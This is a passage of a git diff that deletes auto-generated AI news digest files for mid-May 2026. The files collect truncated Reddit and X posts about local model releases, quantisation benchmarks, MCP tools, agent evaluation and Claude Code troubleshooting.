Agent Security](https://aimagazine.com/news/sailpoint-unveils-agentic-fabric-for-ai-agent-security) -*AI Magazine* | Score: 0.70 -Tags: product_launch, agent_tool - ---- - -## [Open-weights vs. closed models: Nano Banana Pro was nerf'ed](https://reddit.com/r/StableDiffusion/comments/1tecqkx/openweights_vs_closed_models_nano_banana_pro_was/) -*Reddit r/StableDiffusion* | 16/05/2026 | Score: 1.00 -Tags: open_source - -> Companies think that they can nerf the model and people won't notice. 
Here is exhibit 1: Nano Banana Pro has fallen far from the tree. In our independent evaluation, Nano Banana Pro's image generation capability as of recently is worse than FLUX.2 \[dev\] and far from GPT-Image 2 Low. Just a reminder that no weights, not your models. https://preview.redd.it/kqon8d0jyd1h1.png?width=2212&format=png&auto=webp&s=61f3ced9f3b8f6d497d482494117e18c514bb6f3 You can explore our full calibration test set at [https://tests.drawthings.ai/generate](https://tests.drawthings.ai/generate) and [https://tests.drawthings.ai/edit](https://tests.drawthings.ai/edit). We will release the score on our full private test set soon. # 1. Charts **Top: Nano Banana Pro** **Bottom: GPT-Image 2 Low** Prompt: >A pie chart showing browser market share: Chrome 65%, Safari 20%, Firefox 10%, Other 5%. Each section should be appropriately sized and labeled with the browser name and percentage. Nano Banana Pro no longer seems able to make a simple labeled chart reliably. https://preview.redd.it/q67mipl5yd1h1.png?width=1024&format=png&auto=webp&s=4e8d0024331dfd906cda3da5e3cc307b6aec1f9e https:/… - ---- - -## [AllenAI has been iterating on their MolmoAct2 models for robotics](https://reddit.com/r/LocalLLaMA/comments/1te9unl/allenai_has_been_iterating_on_their_molmoact2/) -*Reddit r/LocalLLaMA* | 15/05/2026 | Score: 1.00 -Tags: open_source - -> r/AllenAI is cooking with MolmoAct2, a 5B vision-language-action model for robot control. 
They keep releasing new fine-tunes on different kinds of robotics datasets, including (but not limited to, and they keep releasing new ones): * https://huggingface.co/allenai/MolmoAct2-LIBERO - general robotics tasks * https://huggingface.co/allenai/MolmoAct2-DROID - interactive robotics tasks * https://huggingface.co/allenai/MolmoAct2-BimanualYAM - absolute joint-pose control * https://huggingface.co/allenai/MolmoAct2-SO100_101 - also absolute joint-pose control AllenAI has released these as ***fully open source*** models, publishing not only their weights but also their **complete** training datasets (including pretraining), their training software source code, and technical papers describing the theory, training, and assessments of these models. If anyone is fiddling with robots controlled via LLM inference, you should give MolmoAct2 models a look. - ---- - -## [Gemma4 26b MoE running in MLX with turboquant (and custom kernel)](https://reddit.com/r/LocalLLaMA/comments/1te6os6/gemma4_26b_moe_running_in_mlx_with_turboquant_and/) -*Reddit r/LocalLLaMA* | 15/05/2026 | Score: 1.00 -Tags: cli_tool - -> TL;DR I spent a few crazy evenings this past week seeing if I could get Gemma4 running with proper turbo quant and rotating KV cache support. 
The answer was yes, and I'm now able to run Gemma4 26b on my MacBook Air M5 at 128k context with 4 concurrent batches 😄 At 8k context running with no mmap, it beats llama.cpp at prompt processing, generation speed, and runtime memory: |backend|model|bpw|pp tok/s|gen tok/s|runtime mem| |:-|:-|:-|:-|:-|:-| |llama.cpp|IQ4\_XS + q4\_0 KV + flash-attn|4.25|260.6|14.66|16.0 GB| |MLX (ours)|nvfp4 + polar2|4.5|348.4|17.15|15.22 GB| It took a lot of hand-tuning to get to this speed, including a custom kernel for the SWA layers in order to get the actual runtime 2bit memory savings that enable higher batch sizes whilst staying close to full fp16 prompt processing speed The prompt processing speed scales relatively well with batch size - the major gains though are in the text generation - running a 512 token-long prompt on a 32 GB M5: |B|pp tok/s|gen tok/s| |:-|:-|:-| |1|353|16.0| |4|429|24.9| |8|451|32.4| |16|451|44.2| |32|450|48.0| |64|448|54.6| |128|440|54.0| If you want to download it and serve it yourself, you can open a terminal to a directory y… - ---- - -## [Notes from evaluating a customer support chat agent system: heuristic evaluators give false signal, retrieval bugs masquerade as LLM failures, and the cost/quality Pareto frontier is rarely where you think [D]](https://reddit.com/r/MachineLearning/comments/1te38yg/notes_from_evaluating_a_customer_support_chat/) -*Reddit r/MachineLearning* | 15/05/2026 | Score: 1.00 -Tags: api_update - -> Posting some practical findings from a structured audit of a production customer support RAG system. Methodology and caveats up front. 
**Methodology:** * 6 representative turns from a real production session as the eval set (small, acknowledged limitation) * LLM-as-judge using Claude Haiku 4.5, scoring relevance/accuracy/helpfulness/overall on 0-10, returning per-turn reasoning strings for verification * Same judge across all conditions, same questions, same retrieval state where possible * Production model held constant while isolating retrieval changes, then swept across 5 LLMs once retrieval was fixed * Live pricing from OpenRouter /models API rather than estimates **Findings:** 1. **Heuristic evaluation produces zero signal.** The existing evaluator counted keywords and source references. Output was numerical but uncorrelated with response quality. LLM judges with explicit rubrics caught hallucinations, identified zero-retrieval turns, and produced reasoning that could be spot-checked. The cost is real but small (cents per run) compared to shipping undetected regressions. 2. **Retrieval failures present as generation failures.** A turn where the agent said "I don't have inform… - ---- - -## [Beta testers wanted: MCP server that cuts Claude Code token burn 45–72% on architectural questions (TS/Python/Go)](https://reddit.com/r/ClaudeAI/comments/1tdy7ww/beta_testers_wanted_mcp_server_that_cuts_claude/) -*Reddit r/ClaudeAI* | 15/05/2026 | Score: 1.00 -Tags: mcp - -> Claude Code learns your codebase by brute force every session. A single architectural question such as; "Where does request validation happen?" can chew through 40+ tool calls and 100k tokens reconstructing context. Worse, the architectural decisions that *govern* your code, your ADRs, design docs, "we did it this way because" reasoning are completely invisible to it. Claude will happily propose changes that break constraints you wrote down two months ago. 
I built an MCP server that pre-computes a structured atlas of your codebase (LSP symbols + ADRs + git history + test associations) and serves it to Claude in a fraction of the calls via compact chunks at execution time. Internal benchmarks show **45–72% token reduction on architectural-intent prompts**, replicated across TypeScript (hono), Python (httpx), and Go (cobra) targets. Methodology is paired-mode LLM-judge with pre-registered thresholds. Full rubric and benchmarks repo are public. I also saw cleaner scope adherence and better design choices when implementing new features, driven by the `impact_of_change` tool surfacing constraints before Claude proposes work. v1.0.0 is planned to ship next week. Before then I hoped to f… - ---- - diff --git a/data/digest-2026-05-16.md b/data/digest-2026-05-16.md deleted file mode 100644 index 1c37077..0000000 --- a/data/digest-2026-05-16.md +++ /dev/null @@ -1,123 +0,0 @@ -# Stack Scout - AI News Digest -**2026-05-16** | 15 stories | Auto-generated from 407 archived stories - ---- - -## [Follow-up: the Claude design-spec library is 100 apps now, iOS + Android.](https://reddit.com/r/ClaudeAI/comments/1tevt37/followup_the_claude_designspec_library_is_100/) -*Reddit r/ClaudeAI* | 16/05/2026 | Score: 1.00 -Tags: mcp, open_source, developer_tool, cli_tool - -> Yesterday I posted about turning 50 apps into Claude-readable design specs. It did better than expected, and the two asks in the comments were: more apps, and Android. Both done. The library is now: \- 100 apps (was 50) \- iOS and Android spec for every one The Android pass surfaced something the iOS-only version hid. The problem: an iOS-only spec quietly encodes HIG assumptions you didn't know you were making. 
Hand it to Claude, ask for the Android build, and you get an iOS app in Android's clothes: \- back behavior wrong, no system back \- flat surfaces, no Material elevation \- tab bar where a nav drawer or bottom nav belongs \- SF type scale instead of Roboto and Material The fix: split each spec into two layers. \- Product intent: hierarchy, flow, states. Invariant across platforms. \- Platform layer: Material vs HIG conventions. Swappable. Claude clones far more cleanly when it isn't guessing which layer it's looking at. Repo, both layers, 100 apps, 3 depths each, markdown, MIT, no dependencies: [github.com/Meliwat/awesome-ios-design-md](http://github.com/Meliwat/awesome-ios-design-md) The MCP server and CLI that generate these are free and open source too, so you can spec y… - ---- - -## [GitHub - richardr1126/openreader: An open-source read-along document reader server with high-quality TTS options, synchronized highlighting, and audiobook export for EPUB, PDF, DOCX, TXT, and MD.](https://reddit.com/r/LocalLLaMA/comments/1tf15eh/github_richardr1126openreader_an_opensource/) -*Reddit r/LocalLLaMA* | 16/05/2026 | Score: 1.00 -Tags: api_update, open_source, github_release - -> Sharing my latest release of OpenReader v3.0.0, an open-source text-to-speech document reader and audiobook exporter. It has been live for over a year now, and slowly has gained 300+ GitHub stars. **What is OpenReader?** A Next.js web app for reading and listening to EPUB, PDF, TXT, Markdown, and DOCX files. * Supports multiple TTS providers: OpenAI, Replicate, Deepinfra, and self-hosted OpenAI-compatible APIs (like [Kokoro-FastAPI](https://github.com/remsky/Kokoro-FastAPI), [KittenTTS-FastAPI](https://github.com/richardr1126/KittenTTS-FastAPI)). * **Self-hosted:** your documents, TTS audio, and settings all live on your own server in SQLite or Postgres and Embedded SeaweedFS or External S3. * **Audiobook export:** generate and download m4b/mp3 audiobooks with chapter metadata via ffmpeg. 
**What's new in v3.0.0?** * TTS now preloads audio across multiple pages ahead of where you are. * Audio is cached persistently on the server's embedded or external object storage. * New Admin panel (set `ADMIN_EMAILS` in your env) for managing multiple named TTS providers with separate API keys. * Site-wide feature flags (user signups, provider restrictions, etc.) are now manageable from the Adm… - ---- - -## [macOS support in Lemonade has graduated out of beta!](https://reddit.com/r/LocalLLaMA/comments/1tevjjr/macos_support_in_lemonade_has_graduated_out_of/) -*Reddit r/LocalLLaMA* | 16/05/2026 | Score: 1.00 -Tags: api_update, open_source, developer_tool - -> All major Lemonade capabilities, including OmniRouter, coding, image gen, speech gen, and transcription are all available on Lemonade for macOS thanks to the hard work of u/GeramyL. If you're on macOS and just looking into Lemonade for the first time, we're a local AI solution similar in functionality to LM Studio or Ollama. What sets us apart is: - Open source, community driven, zero telemetry - Focused on local with no cloud upsell - Omni-modal with the ability to input and output images and speech - Developer friendly with a 3 MB portable binary, code once and deploy across Linux/Windows/macOS I hope this release brings more macOS users into the Lemonade community. Stay tuned for the update iPhone app, which can access all of this from your phone! 
GitHub: https://github.com/lemonade-sdk/lemonade Discord: https://discord.gg/5xXzkMu8Zk - ---- - -## [Claude Code in VS Code keeps “answering” by freezing mid-stream, logs show sdk_stream_ended_no_result](https://reddit.com/r/ClaudeAI/comments/1tenric/claude_code_in_vs_code_keeps_answering_by/) -*Reddit r/ClaudeAI* | 16/05/2026 | Score: 0.94 -Tags: api_update, mcp, developer_tool - -> [error message on Claude extension for VS Code](https://preview.redd.it/08qtvuaamg1h1.png?width=910&format=png&auto=webp&s=6c2d4005bcdd6e5c058e5235b8d76b0512753ee6) I’m trying to use Claude Code in VS Code, but it has become almost unusable for larger tasks. The logs show Claude authenticates fine, sends the /v1/messages request, receives the first stream chunk, then the stream stalls. After about 30 seconds the UI reports an error with: eventName: "sdk\_stream\_ended\_no\_result", had\_error: true It is not a simple auth/config failure: OAuth check completes, context window says OK, and the API stream opens. Smaller requests seem to work, but larger multi-part prompts repeatedly freeze with stream stall warnings like: \[Stall\] stream\_idle\_partial lastChunkAgeMs=15002 bytesTotal=669 idleDeadlineMs=300000 There are some unrelated MCP auth/config errors too, but the main issue is that Claude starts responding and then stops producing a usable answer. Has anyone else seen Claude Code/VS Code fail this way on large prompts? Is this a known streaming bug, server-side issue, or something caused by heavy tool/skill context? - ---- - -## [WSL can't reach Kobold.cpp running on Windows, even though the API works fine in PowerShell, SillyTavern & a Kenshi SentientSands Mod. 
Does anyone know the solution?](https://reddit.com/r/LocalLLaMA/comments/1tf7f4d/wsl_cant_reach_koboldcpp_running_on_windows_even/) -*Reddit r/LocalLLaMA* | 16/05/2026 | Score: 1.00 -Tags: api_update, cli_tool - -> Okay sorry for the slop below but I'm losing my mind with this and I'm hoping someone here has dealt with the same setup. (I asked the AI that let me copy&paste shit for 3 hours to summarise what it asked me to do) Here's the situation: * Kobold.cpp is running on Windows * The OpenAI-compatible API is on port 5001 * It works from PowerShell on Windows, SillyTavern and a Kenshi Mod (SentientSands) * But WSL cannot connect to it, even though it's the same machine Kobold.cpp starts normally and shows that the OpenAI-compatible API is running on `http://0.0.0.0:5001/v1/`. From **PowerShell**, this works fine: bash curl http://127.0.0.1:5001/v1/models and it returns the model list. From **WSL**, `pwd` works normally, but this fails: bash curl http://127.0.0.1:5001/v1/models with: bash curl: (7) Failed to connect to 127.0.0.1 port 5001 after 0 ms: Could not connect to server So at this point I know: * Kobold itself is running fine * The API endpoint is working on Windows * The actual problem is specifically WSL trying to reach a service hosted on the Windows side Things I already tried: * Binding Kobold to [`0.0.0.0`](http://0.0.0.0) instead of only localhost * Changing WSL config t… - ---- - -## [I replicated Anthropic's Generator-Evaluator harness to build a website through 12 adversarial AI iterations - here's the result and what I learned](https://reddit.com/r/ClaudeAI/comments/1tf76wp/i_replicated_anthropics_generatorevaluator/) -*Reddit r/ClaudeAI* | 16/05/2026 | Score: 1.00 -Tags: mcp, cli_tool - -> Anthropic recently published their [harness design for long-running apps](https://www.anthropic.com/engineering/harness-design-long-running-apps) — a multi-agent architecture inspired by GANs where a Generator builds code and an Evaluator critiques it in a 
loop. I built my own version using Kiro CLI and used it to generate a marketing website for my project [Mnemo](https://github.com/Mnemo-mcp/Mnemo) (persistent memory for AI coding agents). **The architecture:** Planner (runs once) → Generator ↔ Evaluator (12 iterations) Each agent is a separate CLI process with zero shared context. They communicate only through files (spec.md, eval-report.md). The Evaluator uses Playwright to actually browse the live site — not just read code. **What made it work:** **Clean slate per invocation** — each agent starts fresh, reads only its input files. Prevents context anxiety. **Playwright MCP for testing** — the evaluator navigates, clicks, resizes viewports. Catches visual bugs code review never would. **Anthropic's frontend design skill** — explicitly penalizes generic AI patterns (Inter font, purple gradients, card layouts). Forces creative risk-taking. **Continuous iteration, not retry-on-fa… - ---- - -## [Interconnects newsletter reviews wave of open AI releasesOpen AI models saw a burst of new releases this month from several labs. The Interconnects newsletter reviewed five of them, including Gemma 4 and DeepSeek V4, using the CAISI V4 evaluation framework.](https://www.digg.com/ai/09imapy5?rank=7) -*Digg AI* | Score: 1.00 -Tags: product_launch, developer_tool - ---- - -## [How I started programming differently over the last year. What about you?](https://reddit.com/r/LocalLLaMA/comments/1tf2cxh/how_i_started_programming_differently_over_the/) -*Reddit r/LocalLLaMA* | 16/05/2026 | Score: 1.00 -Tags: cli_tool, agent_tool - -> An interesting observation: I’ve stopped using the LLM-powered autocomplete in my IDE. At first, it was one of the key features for me. It felt extremely convenient: you start writing a function in your code, and the LLM completes it based on common sense or the context from the open tabs. 
But the most interesting thing is that back when LLM autocomplete was useful and in demand, I had already written a script that could go through the source files, let me select what I needed, and prepare the context to feed into an LLM chat so it could tell me what to add or fix. I worked like that for about six months. And even that is gone now. These days it’s easier to open a CLI interface with a coding agent, without even launching the IDE. You describe what you need, use @ to point it to the files it should inspect or modify, and that’s it. Everything is changing at an absolutely insane speed. Basically, the only things I still use an IDE for are nice Git diff visualization, step-by-step debugging, and the ability to click on functions and jump into their implementation. In other words, code navigation. And even that functionality is only needed in about 5-10% of my work. It’s interesting t… - ---- - -## [LLM Phone Home: Reliable Apps that can deliver inference from local backend](https://reddit.com/r/LocalLLaMA/comments/1tez9sb/llm_phone_home_reliable_apps_that_can_deliver/) -*Reddit r/LocalLLaMA* | 16/05/2026 | Score: 1.00 -Tags: api_update, mcp - -> Hello all, I’m wondering what suggestions there are for an ios app that can serve an openai compatible endpoint. I am using 3sparks which works GREAT for that specific use, BUT, there is no mcp, no web search, etc. I want to show people that a local model with web search on your phone is very impressive, but I can’t find an app that can mimic OWUI/LMS/etc. Texting Hermes works but I was hoping to find a solution that is not using a slow agent, just calling requests from local server. So far, I tried: Apollo, Locally AI, Noema, and 3 Sparks. Previously I have gone through other apps that run models in situ (in the iphone) but they don’t have remote endpoint usage. 
Noema seemed promising but Deepseek V4 Flash from my mac studio never makes it through a request (works great with 3 Sparks, but no web search or mcp capability). - ---- - -## [Frameo AI Launches Pixar-Style Short Films Powered by Seedance 2.0 — Native Audio, Multi-Shot, Director Mode](https://x.com/frameo_ai/status/2055642282796400821) -*Aligned News (Scoble)* | 16/05/2026 | Score: 1.00 -Tags: product_launch, tool_update - -> Frameo AI launched Pixar-quality short films on Seedance 2.0 with native audio and Director Mode, making cinematic AI video creation accessible to independent creative producers. - ---- - -## [How Do You Tell If Someone Is Good at Agents? — Scoble Asks the Question the AI Industry Cannot Answer](https://x.com/Scobleizer/status/2055566706714845328) -*Aligned News (Scoble)* | 16/05/2026 | Score: 1.00 -Tags: developer_tool, agent_tool - -> Scoble's question on evaluating agent development talent surfaces the unsolved hiring signal problem as companies scramble for AI agent skills with no reliable credential or assessment framework. - ---- - -## [Qwen3.6-35B-A3B and 9B are officially on the public Terminal-Bench 2.0 leaderboard!](https://reddit.com/r/LocalLLaMA/comments/1temio0/qwen3635ba3b_and_9b_are_officially_on_the_public/) -*Reddit r/LocalLLaMA* | 16/05/2026 | Score: 1.00 -Tags: open_source, cli_tool - -> Qwen3.6-35B-A3B and 9B are officially on the public Terminal-Bench 2.0 leaderboard! little-coder × Qwen3.6-35B-A3B hit 24.6% (±3.2), and **now land above Gemini 2.5 Pro on Gemini CLI (19.6%)** and Qwen3-Coder-480B on Terminus 2 (23.9%). I didn’t expect the scaffold-model gap from Polyglot to hold on a benchmark this hard but it did! little-coder × Qwen3.5-9B came in at 9.2% which is more humble. Yet, it also shows again that **sub-10B local models are now measurable on a hard agentic benchmark**, not assumed unworthy of a slot. Just felt it was right to follow up here as you requested, and say a genuine thanks to this community. 
It really is the place currently driving innovation toward less compute, and this run exists there because you pushed for it. Now it’s time to head for the top of the leaderboard 👀 let’s go open source! - ---- - -## [Claude in Chrome extension stopped working in claude.ai after using Claude Code — anyone else?](https://reddit.com/r/ClaudeAI/comments/1teudps/claude_in_chrome_extension_stopped_working_in/) -*Reddit r/ClaudeAI* | 16/05/2026 | Score: 0.88 -Tags: developer_tool, cli_tool - -> Hey everyone, running into a weird issue and hoping someone has seen this before. A few hours ago, Claude in Chrome was working fine in the claude.ai web app. Then I started using Claude Code (CLI) with the \`--chrome\` flag, which connected to the extension no problem. Ever since, the extension refuses to connect from claude.ai — but it still works fine from Claude Code and the extension itself appears active and logged in. \*\*Setup:\*\* \- Claude in Chrome extension installed and signed in \- Same account on [claude.ai](http://claude.ai) and Claude Code \- Extension shows as active in Chrome toolbar \*\*What works:\*\* \- ✅ Claude Code CLI (\`claude --chrome\`) connects to the browser fine \- ✅ Extension itself appears active and logged in \- ❌ [claude.ai](http://claude.ai) web app: consistently returns "Browser extension is not connected" \*\*What I've already tried (nothing helped):\*\* \- Restarted Chrome \- Restarted PC \- Logged out and back into [claude.ai](http://claude.ai) \- Disabled and re-enabled the extension My theory: once Claude Code connected to the extension, it somehow "claimed" the connection and the [claude.ai](http://claude.ai) web app can no longer get thr… - ---- - -## [Free Premiere Pro extension to download YouTube/Instagram/X videos and auto-import to your project bin](https://reddit.com/r/ClaudeAI/comments/1tf20ta/free_premiere_pro_extension_to_download/) -*Reddit r/ClaudeAI* | 16/05/2026 | Score: 0.78 -Tags: open_source, developer_tool - -> Tired of 
the whole workflow — open browser, find video, download, wait, drag into Premiere. So I built a panel that does it all from inside Premiere. Paste a URL, pick quality, click Download & Import — file lands directly in your project bin. Supports: \- YouTube, Instagram, X/Twitter \- Best / 1080p / 720p / 480p / MP3 \- Live progress bar with ETA \- Auto-import to project bin on finish Powered by yt-dlp under the hood. Built this with the help of Claude (AI) — had the idea and kept iterating until it worked. Free & open source: [https://github.com/gitttsarya/media-fetcher-premiere](https://github.com/gitttsarya/media-fetcher-premiere) Full install guide in the README. Let me know if you run into any issues! https://preview.redd.it/y5svnpjuoj1h1.png?width=482&format=png&auto=webp&s=0dfb391daefb06dbbb37c4b13174efc6a1ca7a22 - ---- - -## [Using Claude chat for making Apps.](https://reddit.com/r/ClaudeAI/comments/1teum62/using_claude_chat_for_making_apps/) -*Reddit r/ClaudeAI* | 16/05/2026 | Score: 0.78 -Tags: api_update, cli_tool - -> I have been using Claude chat to build structural engineering calculation apps, and it has worked very well for me. Claude generates the files, and I host the projects on GitHub. To avoid hitting the context window limit, I periodically start new chat sessions. When I do, I download the ZIP file from GitHub (including the MD file), and paste it into the new chat so Claude has the project context again. I was wondering if there are any drawbacks to working this way. I do not use Claude Code (don’t have coding background )or the terminal much. I tried it once but did not really like the workflow. Most of my coding is done on the go through the chat interface on my phone or on my computer at work and at home. 
- ---- - diff --git a/data/digest-2026-05-17.md b/data/digest-2026-05-17.md deleted file mode 100644 index 94e8b0c..0000000 --- a/data/digest-2026-05-17.md +++ /dev/null @@ -1,125 +0,0 @@ -# Stack Scout - AI News Digest -**2026-05-17** | 15 stories | Auto-generated from 420 archived stories - ---- - -## [I built SeeFlow - architecture diagrams that actually run, wired to your live app](https://reddit.com/r/ClaudeAI/comments/1tfd6j6/i_built_seeflow_architecture_diagrams_that/) -*Reddit r/ClaudeAI* | 17/05/2026 | Score: 1.00 -Tags: mcp, open_source, developer_tool, tool_update - -> Architecture diagrams rot. You spend an afternoon in Confluence, three months later it's wrong, and nobody updates it because there's no forcing function. https://preview.redd.it/9svmg8ih3m1h1.png?width=2508&format=png&auto=webp&s=0d06df1f82fd417ee9a45e504efd26628eaf33fd SeeFlow tries to fix that by making diagrams executable. It generates a flow canvas from your codebase, then wires each node to your actual running app. There's a Claude Code / Codex/ Cursor / Windsurf plugin that does the heavy lifting: >/seeflow show me the shopping cart feature It also ships an MCP server so any MCP-aware editor can register and edit demos without leaving the IDE. Link to the site: [https://seeflow.dev](https://seeflow.dev) 100% Free/ MIT Open Source - ---- - -## [ROCm 7.13 nightly adds strix halo optimizations](https://reddit.com/r/LocalLLaMA/comments/1tftg09/rocm_713_nightly_adds_strix_halo_optimizations/) -*Reddit r/LocalLLaMA* | 17/05/2026 | Score: 1.00 -Tags: product_launch, open_source, tool_update - -> [https://www.phoronix.com/news/ROCm-7.13-Released](https://www.phoronix.com/news/ROCm-7.13-Released) Quote: ...new optimizations for Ryzen AI Max 300 "Strix Halo" and the ROCprof Trace Decoder is now open-source...<snip>... Those rolling from source can grab the ROCm 7.13 Tech Preview via [TheRock on GitHub](https://github.com/ROCm/TheRock/releases/tag/therock-7.13). 
[https://rocm.docs.amd.com/en/7.13.0-preview/about/release-notes.html](https://rocm.docs.amd.com/en/7.13.0-preview/about/release-notes.html) Trivia: Rocm name origin: radeon open compute module - ---- - -## [I updated my tool that turns any book into character & landscape images using RAG + ComfyUI/Gemini — now with Locations support!](https://reddit.com/r/StableDiffusion/comments/1tfro2h/i_updated_my_tool_that_turns_any_book_into/) -*Reddit r/StableDiffusion* | 17/05/2026 | Score: 0.78 -Tags: api_update, open_source, tool_update - -> Hey everyone! I am back with an update to my character generation tool. I got some great feedback when I posted it here, I am pleased to announce that I have integrated a lot of requested features and added a lot more ! **Big thanks to everyone who tried the tool from the first post and gave valuable suggestions !** All the updates and features for just 2.99 a month ! No, just kidding, still fully open source. **Image gallery -** Modern Dracula adaptation, plus some characters from the Eye of the world ( which inspired this whole project ). Tool screenshots at the end. # What's new in this update? # 🔧 QoL updates ! Configurable .env file, api endpoints for Ollama, OpenAI etc, database for books generated, character details saved after generation, image gallery, prompt save feature, installer, updated UI, support for epub/text, Gemini image integration, collapsible sidebars, task manager widget, debug panel to test connections or databases, and tons more # 📍 Locations Tab — "The one I didn't know I needed" This was the exciting one. You can now generate **landscape/architectural images** for prominent locations in the book — not just characters. 
* Click **"Extract Locations from… - ---- - -## [Are local models good enough yet for AI meeting memory?](https://reddit.com/r/LocalLLaMA/comments/1tfukyl/are_local_models_good_enough_yet_for_ai_meeting/) -*Reddit r/LocalLLaMA* | 17/05/2026 | Score: 1.00 -Tags: mcp, tool_update - -> I’ve been testing different ways to handle AI meeting notes and realized the most useful part isn’t the summary, it’s having searchable context from past meetings later. Right now I’m using Bluedot because it handles capture really well, transcripts, summaries, action items, recordings, all searchable after. The new Claude MCP integration made me realize how valuable meeting history becomes once you can actually query it naturally. Are you building local AI meeting memory setups, or are cloud tools still way ahead for this use case? - ---- - -## [NeuralCompanion](https://reddit.com/r/StableDiffusion/comments/1tftqwg/neuralcompanion/) -*Reddit r/StableDiffusion* | 17/05/2026 | Score: 1.00 -Tags: api_update, open_source - -> NeuralCompanion is an open-source, local-first AI companion project for people who like building, experimenting, and seeing how far personal AI can go on their own hardware. It brings together realtime voice chat, local LLMs, TTS/STT, image generation, interactive tutorials, API-friendly workflows, and a modular addon system into one desktop app designed to be flexible, hackable, and genuinely fun to explore. NC also supports avatar systems and avatar engines like VSeeFace, VAM/VAM2, and other experimental realtime avatar workflows. It is still experimental and a little rough around the edges in places, but that is part of the project. The goal is not to make another locked-down corporate assistant. It is to build a customizable AI companion platform you can actually run, modify, and shape yourself. If you are into local AI, creative tools, avatars, plugins, voice interfaces, automation, or weird future-facing software, come take a look. 
GitHub: [https://github.com/Rakile/NeuralCompanion](https://github.com/Rakile/NeuralCompanion) Discord: [https://discord.com/invite/UqnwX46rcK](https://discord.com/invite/UqnwX46rcK) Developers, tinkerers, artists, AI enthusiasts, and curious peop… - ---- - -## [Made a simple template manager and GUI for llama.cpp so I don't have to keep memorizing CLI flags.](https://reddit.com/r/LocalLLaMA/comments/1tfqrbt/made_a_simple_template_manager_and_gui_for/) -*Reddit r/LocalLLaMA* | 17/05/2026 | Score: 1.00 -Tags: product_launch, cli_tool - -> [Introducing Hexllama](https://reddit.com/link/1tfqrbt/video/uobdgqq1hp1h1/player) Hey, I’ve always found **llama-server** to be more than enough for testing out local models, mostly because it guarantees you always have the absolute latest llama.cpp features and architecture support. But keeping track of different CLI commands, context sizes, and batch settings for different models was becoming a massive headache. Plus, managing multiple terminal tabs when I wanted to run two models at once was annoying. So, I built **Hexllama**. It's a fast desktop interface that gets out of your way and just makes managing llama.cpp easier. No walled gardens, just a clean wrapper. **What it actually does:** * **Template-Based Execution:** You configure your CLI flags (threads, context, etc.) once via a visual editor, save it as a template, and from then on it’s just one click to run. * **Built-in llama.cpp Version Manager:** This is the feature I use the most. It auto-checks the ggml-org repo, lets you download new releases directly in the app, and lets you swap backends instantly (super useful when a new model architecture drops and needs a specific build). 
* **Integrated HF Downloader:** Sear… - ---- - -## [Kimi K 2.6 is good and can get free api keys from Nvidia integrate with aider launch in powershell and you got something same as claude code for testing new ideas before paying for claude subscription](https://x.com/lordsa_m/status/2055959075012104631) -*X search / AI model updates* | 17/05/2026 | Score: 1.00 -Tags: api_update, cli_tool - -> Kimi K 2.6 is good and can get free api keys from Nvidia integrate with aider launch in powershell and you got something same as claude code for testing new ideas before paying for claude subscription - ---- - -## [Is there a new Wan2.2 lightx2v (20260412) FP8 version for ComfyUI?](https://reddit.com/r/StableDiffusion/comments/1tfkwx7/is_there_a_new_wan22_lightx2v_20260412_fp8/) -*Reddit r/StableDiffusion* | 17/05/2026 | Score: 1.00 -Tags: github_release, tool_update - -> I decided to check the `lightx2v` Hugging Face account and noticed they released an updated version of their distilled Wan2.2 i2v A14b model about a month ago. They uploaded a new version 20260412 on Hugging Face, "Wan2.2-Distill-Models" repository. (Can't post a link because Reddit filters block the post) However, they only uploaded the FP32 version, which is also incompatible with ComfyUI. I can't find a converted version via Google or Hugging Face search. Does anyone know how to convert this model to FP8, or would someone be willing to convert it and upload it? - ---- - -## [Jackrong/Qwopus3.5-9B-Coder-GGUF · Hugging Face](https://reddit.com/r/LocalLLaMA/comments/1tfin40/jackrongqwopus359bcodergguf_hugging_face/) -*Reddit r/LocalLLaMA* | 17/05/2026 | Score: 1.00 -Tags: open_source, agent_tool - -> >**Qwopus3.5-9B-coder** is specially optimized and fine-tuned for high-performance **🤖 Agentic Coding, complex Tool Calling, and logical reasoning.** >*💡* ***Why the 9B Dense Model?*** *We believe that the 9B dense architecture represents the perfect* ***"sweet spot"*** *for large language models. 
It runs seamlessly at 8-bit precision on entry-level 16GB RAM devices—such as standard laptops and the Mac mini—making it exceptionally lightweight yet highly versatile. Without requiring expensive hardware, it allows you to achieve excellent performance paired with impressive inference speeds. Simply put,* ***Qwen3.5-9B is currently the best open-source model in its class.*** # 🛠 Training Strategy The fine-tuning process of this model deeply integrates **Trace Inversion** data augmentation technology with high-quality **Agent Traces**. This systematic approach not only strengthens the model's ability to solve complex programming tasks, but also greatly improves its logical coherence and accuracy when using various tools. This model is designed specifically for the following goals: * 🧩 More structured and stronger logical reasoning capabilities, reducing repetitive thinking * �… - ---- - -## [2026.5.16 released. Highlights: - xAI Grok via SuperGrok OAuth provides 1M token context window - OpenAI‑compatible local proxy allows any OAuth‑authored provider to speak the OpenAI API Full release notes:](https://x.com/OliverB72157882/status/2055972796711502049) -*X search / AI model updates* | 17/05/2026 | Score: 0.98 -Tags: api_update, tool_update - -> 2026.5.16 released. Highlights: - xAI Grok via SuperGrok OAuth provides 1M token context window - OpenAI‑compatible local proxy allows any OAuth‑authored provider to speak the OpenAI API Full release notes: - ---- - -## [I ran 100 Claude + Codex sessions in parallel to understand what I'm doing wrong in marketing my open source "Claude Command Center". Here's the playbook they came up with.](https://reddit.com/r/ClaudeAI/comments/1tfbxmf/i_ran_100_claude_codex_sessions_in_parallel_to/) -*Reddit r/ClaudeAI* | 17/05/2026 | Score: 0.94 -Tags: open_source, tool_update - -> A week ago I launched my open-source project (Claude Control Center) on this subreddit. Got 0 upvotes. Dead in 5 hours. 
:) \[The app is awesome - great way to manage multiple sessions and avoid waiting on top of Claude + Codex - try it :) [git:amirfish1/ccc](http://github.com/amirfish1/claude-command-center) . So I spawned **100 Claude + Codex agents** in parallel and asked them to figure out what I did wrong (It had two hours left on my weekly Claude limit and 20% left - tried to think of good use :) ) . 30 minutes and 100 artifacts later, they handed me back a playbook. https://reddit.com/link/1tfbxmf/video/0mi1ytksol1h1/player The headline finding: stars don't come from better code. They come from: marketing surface. Tagline, demo GIF, founder credential, hosted landing page, multi-shot Hacker News, awesome-list inclusion. The system found that gap on its own - I never told it to study marketing. 5-min video walking through the 7 findings + what the agents drafted (Show HN body, X thread, LinkedIn post, channel plan): [https://youtu.be/Tm2svTe\_Ed4](https://youtu.be/Tm2svTe_Ed4) The video itself - is \*ON PURPOSE\* 100% built by the AI who created the agents \[happy to share th… - ---- - -## [Claude Code context-window: /clear after EVERY task in the codebase or are there edge 